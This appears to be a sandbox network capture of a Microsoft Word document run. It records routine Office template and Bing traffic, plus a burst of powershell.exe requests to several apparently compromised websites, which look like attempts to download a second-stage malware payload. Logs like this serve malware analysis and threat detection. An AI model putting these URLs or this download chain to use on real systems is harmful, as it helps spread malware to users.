GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 698244
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
ETag: 0x8D60DDB6CAEA91D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1097591
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
Last-Modified: Wed, 29 Aug 2018 18:16:06 GMT
ETag: 0x8D60DDB7D10C490
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f8f55181-d01e-00e1-6697-a0df1c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1881952
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
ETag: 0x8D60DDC0007D57D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 380b83a1-d01e-0040-6a97-a01187000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1310275
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
ETag: 0x8D60DDBA6587FB6
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4f0118c-501e-0148-3a97-a06910000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 2527736
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8laspQm0xsAUTSeMcDawqA==
Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
ETag: 0x8D60DDBDD02F94A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
DNS

162.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.62.23.in-addr.arpa

IN PTR

Response

162.61.62.23.in-addr.arpa

IN PTR

a23-62-61-162deploystaticakamaitechnologiescom
DNS

23.251.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.251.17.2.in-addr.arpa

IN PTR

Response

23.251.17.2.in-addr.arpa

IN PTR

a2-17-251-23deploystaticakamaitechnologiescom
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 621794
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DFD8B23ACE2A4F1C99B4C97990E9F26A Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
date: Mon, 20 May 2024 12:39:21 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 792794
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 89EA1689DA75476AAD8A88412D220C27 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
date: Mon, 20 May 2024 12:39:21 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 627437
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B6C515ADB96647A695C925B3A6A34FC9 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
date: Mon, 20 May 2024 12:39:21 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 659775
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3A43083CA57E4BC699E4040793612494 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
date: Mon, 20 May 2024 12:39:21 GMT
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

106.246.116.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.246.116.51.in-addr.arpa

IN PTR

Response

52.109.28.47:443

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

tls, http

WINWORD.EXE

1.7kB
7.7kB
11
10

HTTP Request

POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

HTTP Response

200
66.96.134.60:80

http://givingthanksdaily.com/web/VK/

http

powershell.exe

308 B
1.3kB
5
3

HTTP Request

GET http://givingthanksdaily.com/web/VK/

HTTP Response

404
103.197.57.20:80

http://tskgear.com/wp-content/uploads/2017/Fo/

http

powershell.exe

364 B
697 B
6
4

HTTP Request

GET http://tskgear.com/wp-content/uploads/2017/Fo/

HTTP Response

301
103.197.57.20:443

https://tskgear.com/product/foscor-double-helical/

tls, http

powershell.exe

2.1kB
70.0kB
34
59

HTTP Request

GET https://tskgear.com/wp-content/uploads/2017/Fo/

HTTP Response

301

HTTP Request

GET https://tskgear.com/product/foscor-double-helical/

HTTP Response

200
88.221.83.184:443

https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

tls, http2

1.4kB
6.2kB
16
11

HTTP Request

GET https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

HTTP Response

200
177.12.170.95:443

https://mrveggy.com/erros/tS1/

tls, http

powershell.exe

768 B
4.1kB
9
9

HTTP Request

GET https://mrveggy.com/erros/tS1/

HTTP Response

403
173.254.237.178:80

http://uniteddatabase.net/cgi-sys/suspendedpage.cgi

http

powershell.exe

557 B
8.7kB
9
11

HTTP Request

GET http://uniteddatabase.net/wp-admin/tf/

HTTP Response

302

HTTP Request

GET http://uniteddatabase.net/cgi-sys/suspendedpage.cgi

HTTP Response

200
23.62.61.162:443

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

tls, http

WINWORD.EXE

1.2kB
5.9kB
8
8

HTTP Request

GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

tls, http

WINWORD.EXE

2.6kB
50.1kB
34
41

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

tls, http

WINWORD.EXE

2.4kB
41.0kB
30
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

tls, http

WINWORD.EXE

1.7kB
37.5kB
20
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

tls, http

WINWORD.EXE

32.0kB
1.0MB
571
738

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

tls, http

WINWORD.EXE

85.7kB
3.4MB
1612
2459

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

tls, http

WINWORD.EXE

2.0kB
30.5kB
23
27

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

tls, http

WINWORD.EXE

2.4kB
39.7kB
30
34

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

tls, http

WINWORD.EXE

1.8kB
36.2kB
21
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

tls, http

WINWORD.EXE

10.1kB
278.2kB
156
206

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

tls, http

WINWORD.EXE

8.8kB
267.7kB
144
199

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

tls, http

WINWORD.EXE

2.6kB
38.9kB
31
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

tls, http

WINWORD.EXE

2.1kB
41.7kB
27
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

tls, http

WINWORD.EXE

2.0kB
37.5kB
25
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

tls, http

WINWORD.EXE

2.5kB
38.9kB
31
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

tls, http

WINWORD.EXE

14.5kB
340.3kB
226
249

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

tls, http

WINWORD.EXE

36.2kB
1.2MB
614
835

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

tls, http

WINWORD.EXE

26.9kB
759.7kB
432
549

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

tls, http

WINWORD.EXE

59.8kB
1.8MB
1029
1334

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

tls, http

WINWORD.EXE

1.9kB
25.9kB
22
24

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

tls, http

WINWORD.EXE

2.1kB
37.1kB
26
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

tls, http

WINWORD.EXE

13.0kB
319.8kB
203
236

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

tls, http

WINWORD.EXE

78.8kB
2.7MB
1403
1962

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

tls, http

WINWORD.EXE

121.4kB
3.6MB
1993
2555

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

tls, http

WINWORD.EXE

3.5kB
71.1kB
46
58

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

tls, http

WINWORD.EXE

1.6kB
32.0kB
18
28

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

tls, http

WINWORD.EXE

1.8kB
27.5kB
21
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

tls, http

WINWORD.EXE

1.6kB
27.2kB
17
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

tls, http

WINWORD.EXE

1.6kB
28.2kB
18
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

tls, http

WINWORD.EXE

1.6kB
29.7kB
18
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

tls, http

WINWORD.EXE

1.5kB
27.6kB
16
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

tls, http

WINWORD.EXE

2.0kB
28.0kB
23
24

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

tls, http

WINWORD.EXE

1.6kB
27.4kB
17
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

tls, http

WINWORD.EXE

1.5kB
24.9kB
15
23

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

tls, http

WINWORD.EXE

6.7kB
310.2kB
119
228

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

tls, http

WINWORD.EXE

9.0kB
291.8kB
161
213

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

tls, http

WINWORD.EXE

9.0kB
287.7kB
146
211

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

tls, http

WINWORD.EXE

21.5kB
573.5kB
321
418

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

tls, http

WINWORD.EXE

21.8kB
666.1kB
361
484

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

tls, http

WINWORD.EXE

21.7kB
726.9kB
377
526

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

tls, http

WINWORD.EXE

39.5kB
1.1MB
684
824

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

tls, http

WINWORD.EXE

75.7kB
2.2MB
1177
1558

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

tls, http

WINWORD.EXE

44.4kB
1.4MB
717
982

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

tls, http

WINWORD.EXE

81.6kB
2.6MB
1377
1881

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

HTTP Response

200
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

tls, http2

97.6kB
2.8MB
2037
2031

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

